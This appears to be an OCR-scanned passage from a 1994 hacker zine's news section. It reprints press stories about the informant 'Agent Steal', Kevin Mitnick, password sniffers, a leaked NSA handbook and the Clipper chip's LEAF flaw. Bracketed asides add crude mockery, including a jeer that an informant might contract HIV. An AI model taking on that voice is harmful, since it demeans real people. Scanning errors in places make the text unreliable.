After the teenager’s arrest, local police shared the list with Bell 
Atlantic’s fraud prevention group. Within hours, the phone numbers wer 
communicated to the appropriate regional phone companies and corporate 
customers on the list were advised to either change their authorization 
codes or shut down outside dialing privileges. 


"We can’t curb fraud without full disclosure and sharing this type 
of vital information" points out Mary Chacanias, manager of 
telecommunications fraud prevention for Bell Atlantic in Arlington, VA. 


AT&T Forms Team to Track Hackers August 30, 1994 
(Reuters News Wire) 

AT&T Corp.’s Global Business Communications Systems subsidiary said 
Wednesday it has formed an investigative unit to monitor, track and 

catch phone-system hackers in the act of committing toll fraud. 

The unit will profile hacker activity and initiate "electronic 

stakeouts" with its business communications equipment in cooperation 

with law enforcement agencies, and work with them to prosecute the 

thieves. 

"We’re in a shoot-out between /’/high-tech cops’ -- like AT&T -- and 

‘high-tech robbers’ who brazenly steal long distance service from our 
business customers," said Kevin Hanley, marketing director for business 
security systems for AT&T Global Business. 

"Our goal is not only to defend against hackers but to get them off the 
street." 

[Oh my God. Are you scared? Have you wet yourself? YOU WILL! ] 

Former FBI Informant a Fugitive July 31, 1994 


by Keith Stone (Daily News) 


Computer outlaw Justin Tanner Petersen and prosecutors 
cut a deal: The Los Angeles nightclub promoter known in 
the computer world as "Agent Steal" would work for the 
government in exchange for freedom. 


With his help, the government built its case against 
Kevin Lee Poulsen, a Pasadena native who pleaded guilty 
in June to charges he electronically rigged telephones at 
Los Angeles radio stations so he could win two Porsches, 
$22,000 and two trips to Hawaii. 


Petersen also provided information on Kevin Mitnick, a 
Calabasas man wanted by the FBI for cracking computer and 
telephone networks at Pacific Bell and the state Department 
of Motor Vehicles, according to court records. 


Petersen’s deal lasted for nearly two years - until 
authorities found that while he was helping them undercover, 
he also was helping himself to other people’s credit cards. 


Caught but not cornered, the 34-year-old "Agent Steal" had 
one more trick: He admitted his wrongdoing to a prosecutor 
at the Los Angeles U.S. Attorney’s Office, asked to meet 
with his attorney and then said he needed to take a walk. 


28 .txt Wed Apr 26 09:43:41 2017 6 


And he never came back. 


A month after Petersen fled, he spoke with a magazine for 
computer users about his role as an FBI informant, who he 
had worked against and his plans for the future. 


"T have learned a lot about how the bureau works. Probably 

too much," he said in an interview that Phrack Magazine published 
Nov. 17, 1993. Phrack is available on the Internet, a worldwide 
network for computer users. 


Petersen told the magazine that working with the FBI was fun 
most of the time. "There was a lot of money and resources used. 
In addition, they paid me well," he said. 


"If I didn’t cooperate with the bureau," he told Phrack, "I 
could have been charged with possession of government material." 


"Most hackers would have sold out their mother," he added. 


Petersen is described as 5 foot, 11 inches, 175 pounds, with 
brown hair -— "sometimes platinum blond." But his most telling 
characteristic is that he walks with the aid of a prosthesis 
because he lost his left leg below the knee in a car accident. 


Heavily involved in the Hollywood music scene, Petersen’s 
last known employer was Club "Velvet Jam," one of a string of 
clubs he promoted in Los Angeles. 


Hacker in Hiding July 31, 1994 


by John Johnson (LA Times) 


First there was the Condor, then Dark Dante. The latest computer hacker to 
hit the cyberspace most wanted list is Agent Steal, a slender, good-looking 
rogue partial to Porsches and BMWs who bragged that he worked undercover 
for the FBI catching other hackers. 


Now Agent Steal, whose real name is Justin Tanner Petersen, is on the run 
from the very agency he told friends was paying his rent and flying him to 
computer conferences to spy on other hackers. 


Petersen, 34, disappeared Oct. 18 after admitting to federal prosecutors 
that he had been committing further crimes during the time when he was 
apparently working with the government "in the investigation of other 
persons," according to federal court records. 


Ironically, by running he has consigned himself to the same secretive lif 

as Kevin Mitnick, the former North Hills man who is one of the nation’s most 
infamous hackers, and whom Petersen allegedly bragged of helping to set up 
for an FBI bust. Mitnick, who once took the name Condor in homage to a 
favorite movie character, has been hiding for almost two years to avoid 
prosecution for allegedly hacking into computers illegally and posing as a 
law enforcement officer. 


Authorities say Petersen’s list of hacks includes breaking into computers 
used by federal investigative agencies and tapping into a credit card 
information bureau. Petersen, who once promoted after-hours rock shows in 
the San Fernando Valley, also was involved in the hacker underground’s most 
sensational scam - hijacking radio station phone lines to win contests with 
prizes ranging from new cars to trips to Hawaii. 


Petersen gave an interview last year to an on-line publication called Phrack 
in which he claimed to have tapped the phone of a prostitute working for 
Heidi Fleiss. He also boasted openly of working with the FBI to bust 
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"When I went to work for the bureau I contacted him," Petersen said in the 


interview conducted by Mike Bowen. "He was still up to his old tricks, so 
we opened a case on him. . . . What a loser. Everyone thinks he is some 
great hacker. I outsmarted him and busted him." 


In the Phrack interview, published on the Internet, an international network 
of computer networks with millions of users, Agent Steal bragged about 
breaking into Pacific Bell headquarters with Poulsen to obtain information 
about the phone company’s investigation of his hacking. 


Petersen was arrested in Texas in 1991, where he lived briefly. Court 
records show that authorities searching his apartment found computer 
equipment, Pacific Bell manuals and five modems. 


A grand jury in Texas returned an eight-count indictment against Petersen, 
accusing him of assuming false names, accessing a computer without 

authorization, possessing stolen mail and fraudulently obtaining and using 
credit cards. 


he case was later transferred to California and sealed, out of concern for 
etersen’s safety, authorities said. The motion to seal, obtained by 
herman, states that Petersen, "acting in an undercover capacity, currently 
Ss cooperating with the United States in the investigation of other persons 
n California." 


Pew 


In the Phrack interview, Petersen makes no apologies for his choices in life. 


While discussing Petersen’s role as an informant, Mike Bowen says, "I think 
that most hackers would have done the same as you." 


"Most hackers would have sold out their mother," Petersen responded. 


Computer Criminal Caught After 10 Months on the Run August 30, 1994 


by Keith Stone (Daily News) 
Convicted computer criminal Justin Tanner Petersen was captured Monday in 
Los Angeles, 10 months after federal authorities said they discovered he 
had begun living a dual life as their informant and an outlaw hacker. 


Petersen, 34, was arrested about 3:30 a.m. outside a Westwood apartment 
that FBI agents had placed under surveillance, said Assistant U.S. 
Attorney David Schindler. 


A flamboyant hacker known in the computer world as "Agent Steal," Petersen 
was being held without bail in the federal detention center in Los Angeles. 
U.S. District Court Judge Stephen V. Wilson scheduled a sentencing hearing 
for Oct. 3l. 


Petersen faces a maximum of 40 years in prison for using his sophisticated 
computer skills to rig a radio contest in Los Angeles, tap telephone lines 
and enrich himself with credit cards. 


Monday’s arrest ends Petersen’s run from the same FBI agents with whom he 
had once struck a deal: to remain free on bond in exchange for pleading 
guilty to several computer crimes and helping the FBI with other hacker 
cases. 


The one-time nightclub promoter pleaded guilty in April 1993 to six federal 
charges. And he agreed to help the government build its case against Kevin 
Lee Poulsen, who was convicted of manipulating telephones to win radio 
contests and is awaiting trial on espionage charges in San Francisco. 


Authorities said they later learned that Petersen had violated the deal by 
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committing new crimes even as he was awaiting sentencing in the plea 
agreement. 


On Monday, FBI agents acting on a tip were waiting for Petersen when he parked 
a BMW at the Westwood apartment building. An FBI agent called Petersen’s 
name, and Petersen began to run, Schindler said. 

Two FBI agents gave chase and quickly caught Petersen, who has a prosthetic 
lower left leg because of a car-motorcycle accident several years ago. 


In April 1993, Petersen pleaded guilty to six federal charges including 
conspiracy, computer fraud, intercepting wire communications, transporting 

a stolen vehicle across state lines and wrongfully accessing TRW credit 
files. Among the crimes that Petersen has admitted to was working with other 
people to seize control of telephone lines so they could win radio 
promotional contests. In 1989, Petersen used that trick and walked away with 
$10,000 in prize money from an FM station, court records show. 


When that and other misdeeds began to catch up with him, Petersen said, he 
fled to Dallas, where he assumed the alias Samuel Grossman and continued 
using computers to make money illegally. 


When he as finally arrested in 1991, Petersen played his last card. 

"I called up the FBI and said: ’Guess what? I am in jail,’ " he said. 

He said he spent the next four months in prison, negotiating for his freedom 
with the promise that he would act as an informant in Los Angeles. 


[The FBI paid his rent and utilities and gave him $200 a week for spending 
money and medical insurance, Petersen said. 


They also provided him with a computer and phone lines to gather information 
on hackers, he said. 


Eventually, Petersen said, the FBI stopped supporting him so he turned to 
his nightclubs for income. But when that began to fail, he returned to 
hacking for profit. 


"IT was stuck out on a limb. I was almost out on the street. My club 
was costing me money because it was a new club," he said. "So I did what 
I had to do. I an not a greedy person." 


[Broke, Busted, Distrusted. Turning in your friends leads to some 
seriously bad Karma, man. Negative energy like that returns ten-fold. 
You never know in what form either. You could end getting shot, 
thrown in jail, or worse, test HIV Positive. So many titty-dancers, 
so little time, eh dude? Good luck and God bless ya’ Justin.] 


Fugitive Hacker Baffles FBI With Technical Guile July 5, 1994 


by John Markoff (New York Times) 


[Mitnik, Mitnik, Mitnik, and more Mitnik. Poor bastard. No rest for 
the wicked, eh Kevin?] 


Computer Outlaws Invade the Internet May 24, 1994 


by Mike Toner (Atlanta Journal-Constitution) 


A nationwide wave of computer break-ins has law enforcement 
authorities scrambling to track down a sophisticated ring of 
"hackers" who have used the international "information 

highway," the Internet, to steal more than 100,000 passwords -- the 
electronic keys to vast quantities of information stored on 
government, university and corporate computer systems. 
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Since the discovery of an isolated break-in last year ata 

single computer that provides a "gateway" to the Internet, 
operators of at least 30 major computer systems have found illicit 
password "sniffers" on their machines. 


The Federal Bureau of Investigation has been investigating the 
so-called "sniffer" attacks since February, but security experts 
say the intrusions are continuing -- spurred, in part, by the 
publication last month of line-by-line instructions for the 
offending software in an on-line magazine for hackers. 


Computer security experts say the recent rash of password piracy 
using the Internet is much more serious than earlier security 
violations, like the electronic "worm" unleashed in 1988 by 
Cornell University graduate student Robert Morris. 


"This is a major concern for the whole country," she says. 

"I’ve had some sleepless nights just thinking about what could 
happen. It’s scary. Once someone has your ID and your password, 
they can read everything you own, erase it or shut a system down. 
They can steal proprietary information and sell it, and you might 
not even know it’s gone." 


"Society has shifted in the last few years from just using 
computers in business to being absolutely dependent on them and the 
information they give us and the bad guys are beginning to 
appreciate the value of information," says Dain Gary, manager of 
the Computer Emergency Response Team (CERT), a crack team of 
software experts at Carnegie-Mellon University in Pittsburgh that 
is supported by the Defense Department’s Advanced Research Projects 


Agency. 


Gary says the current rash of Internet crime appears to be the 

work of a "loosely knit but fairly organized group" of computer 
hackers adept not only at breaking and entering, but at hiding 

their presence once they’re in. 


Most of the recent break-ins follow a similar pattern. The 
intruders gain access to a computer system by locating a weakness 
in its security system -- what software experts call an "unpatched 
vulnerability." 


Once inside, the intruders install a network monitoring program, 

a "sniffer," that captures and stores the first 128 keystrokes 

of all newly opened accounts, which almost always includes a user’s 
log-on and password. 


"We really got concerned when we discovered that the code had 

been published in Phrack, an on-line magazine for hackers, on April 
1," he says. "Putting something like that in Phrack is a little 
like publishing the instructions for converting semiautomatic 
weapons into automatics. 


Even more disturbing to security experts is the absence of a 
foolproof defense. CERT has been working with computer system 
administrators around the country to shore up electronic security, 
but the team concedes that such "patches" are far from perfect. 


[Look for plans on converting semiautomatic weapons into automatics 
in the next issue. ] 


Information Superhighwaymen Hacker Menace Persists 


(Open Computing) (Page 25) 


May 1994 


Once again the Internet has been labeled a security problem. And a new 
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breed of hackers has attracted attention for breaking into systems. 
"This is a group of people copying what has been done for years," says 
Chris Goggans, aka Erik Bloodaxe. "There’s one difference: They don’t 
play nice." 


Goggans was a member of the hacker gang called the Legion of Doom in the 
late ’80s to early '90s. Goggans says the new hacking group, which goes 
by the name of "The Posse," has broken into numerous Business Week 1000 
companies including Sun Microsystems Inc., Boeing, and Xerox. He says 
they’ve logged onto hundreds of universities and online services lik 

The Well. And they’re getting root access on all these systems. 


For their part, The Posse--a loose band of hackers--isn’t talking. 


Security Experts: Computer Hackers a Growing Concern July 22, 1994 


New York Times News Wire (Virginian-Pilot and Ledger Star) (2A) 


Armed with increasing sophisticated snooping tools, computer programmers 
operating both in the United States and abroad have gained unauthorized 
access to hundreds of sensitive but unclassified government and military 
computer networks called Internet, computer security experts said. 


Classified government and military data, such as those that control 
nuclear weapons, intelligence and other critical functions, are not 
connected to the Internet and are believed to be safe from the types of 
attacks reported recently. 


The apparent ease with which hackers are entering military and government 
systems suggests that similar if not greater intrusions are under way on 
corporate, academic and commercial networks connected to the Internet. 


Several sources said it was likely that only a small percentage of 
intrusions, perhaps fewer than 5 percent, have been detected. 


NSA Semi-confidential Rules Circulate 


By Keay Davidson (San Francisco Examiner) (Page Al) 


It arrived mysteriously at an Austin, Texas, post office box by "snail 
mail" -— computerese for the Postal Service. But once the National Security 
Agency’s employee handbook was translated into bits and bytes, it took 

only minutes to circulate across the country. 


Thus did a computer hacker in Texas display his disdain for government 
secrecy last week - by feeding into public computer networks the 
semiconfidential document, which describes an agency that, during the darkest 
days of the Cold War, didn’t officially "exist." 


Now, anyone with a computer, telephone, modem and basic computer skills 

can read the 36-page manual, which is stamped "FOR OFFICIAL USE ONLY" and 
offers a glimpse of the shadowy world of U.S. intelligence - and the personal 
price its inhabitants pay. 


"Your home, car pool, and public places are not authorized areas to 

conduct classified discussions ven if everyone involved in the discussion 
possesses a proper clearance and "need-to-know.’ The possibility that a 
conversation could be overheard by unauthorized persons dictates the need to 
guard against classified discussions in non-secure areas." 


The manual is "so anal retentive and paranoid. This gives you some 

insight into how they think," said Chris Goggans, the Austin hacker who 
unleashed it on the computer world. His on-line nom de plume is "Erik 
Bloodaxe" because "when I was about 11, I read a book on Vikings, and that 
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name really struck me." 


NSA spokeswoman Judi Emmel said Tuesday that "apparently this document is 

an (NSA) employee handbook, and it is not classified." Rather, it is an 
official NSA employee manual and falls into a twilight zone of secrecy. On 
one hand, it’s "unclassified." On the other hand, it’s "FOR OFFICIAL US! 
ONLY" and can be obtained only by filing a formal request under the U.S. 
Freedom of Information Act, Emmel said. 


| 


"While you may take this handbook home for further study, remember that 

it does contain "FOR OFFICIAL USE ONLY’ information which should be 
protected," the manual warns. Unauthorized release of such information could 
result in "appropriate administrative action ... (and) corrective and/or 
disciplinary measures." 


Goggans, 25, runs an on-line electronic "magazine" for computer hackers 
called Phrack, which caters to what he calls the "computer underground." He 
is also a computer engineer at an Austin firm, which he refuses to name. 
The manual recently arrived at Goggans’ post office box in a white 

envelope with no return address, save a postmark from a Silicon Valley 
location, he says. Convinced it was authentic, he typed it into his computer, 
then copied it into the latest issue of Phrack. 


Other hackers, like Grady Ward of Arcata, Humboldt County, and Jeff 

Leroy Davis of Laramie, Wyo., redistributed the electronic files to computer 
users’ groups. These included one run by the Cambridge, Mass.-—based 
Electronic Frontier Foundation, which fights to protect fr speech on 
computer networks. 


Ward said he helped redistribute the NSA manual "to embarrass the NSA" 
and prove that even the U.S. government’s most covert agency can’t keep 
documents secret. 


The action also was aimed at undermining a federal push for 
data-encryption regulations that would let the government tap into computer 
networks, Ward said. 


[Yeah...sure it was, Grady.] 


Hackers Stored Pornography in Computers at Weapons Lab July 13, 1994 


by Adam S. Bauman (Virginian-Pilot and Ledger-Star) (Page A6) 


One of the nation’s thr nuclear weapons labs has confirmed that 
computer hackers were using its computers to store and distribute 
hard-core pornography. 


The offending computer, which was shut down after a Los Angeles Times 
reporter investigating Internet hacking alerted lab officials, contained 
more than 1,000 pornographic images. It was believed to be the largest 
cache of illegal hardcore pornography ever found on a computer network. 


At Lawrence Livermore, officials said Monday that they believed at least 
one lab employ was involved in the pornography ring, along with an 
undetermined number of outside collaborators. 


[Uh, let me see if I can give this one a go: 


A horny lab technician at LLNL.GOV uudecoded gifs for days on end 
from a.b.p.e. After putting them up on an FSP site, a nosey schlock 
reporter blew the whistle, and wrote up a big "hacker-scare" article. 


The top-notch CIAC team kicked the horn-dog out the door, and began 
frantically scouring the big Sun network at LLNL for other breaches, 
all the while scratching their heads at how to block UDP-based apps 
like FSP at their firewall. MPEGs at 11. 
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Clipper Flaw May Thwart Fed Effort June 6, 


by Aaron Zitner (Boston Globe) 


Patents, Technical Snares May Trip Up the ’Clipper’ June 6, 


by Sharon Fisher (Communications Week) (Page 1) 


[Clipper, Flipper, Slipper. It’s all a big mess, and has obsoleted 
itself. But, let’s sum up the big news: 


How the Clipper technology is SUPPOSED to work 


1) Before an encoded message can be sent, a clipper computer chip 
assigns and tests a scrambled group of numbers called a LEAF, for 

Law Enforcement Access Field. The LEAF includes the chip’s serial 
number, a "session key" number that locks the message and a "checksum" 
number that verifies the validity of the session key. 


2) With a warrant to wiretap, a law-enforcement agency like the FBI 
could record the message and identify the serial number of a Clipper 
chip. It would then retrieve from custodial agencies the two halves of 
that chip’s decoding key. 


3) Using both halves of the decoding key, the FBI would be able to 
unscramble the session key number, thus unlocking the messages or data 
that had been protected. 


How the Clipper technology is FLAWED (YAY, Matt Blaze!) 


1) Taking advantage of design imperfections, people trying to defeat 
the system could replace the LEAF until it erroneously passed the 
"checksum" verification, despite an invalid session-key number. 


2) The FBI would still be able to retrieve a decoding key, but it would 
prove useless. 


3) Because the decoding key would not be able to unscramble the invalid 
session key, the message would remain locked. ] 
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